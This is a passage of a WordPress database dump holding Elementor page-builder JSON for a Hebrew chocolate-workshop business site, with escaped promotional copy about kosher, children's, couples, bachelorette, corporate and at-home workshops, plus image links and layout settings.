\\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8. <br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2260,428,'_elementor_edit_mode','builder'),(2261,428,'_elementor_template_type','wp-page'),(2262,428,'_elementor_version','2.7.5'),(2263,428,'_elementor_pro_version','2.7.3'),(2264,428,'_wp_page_template','elementor_header_footer'),(2265,428,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2266,428,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 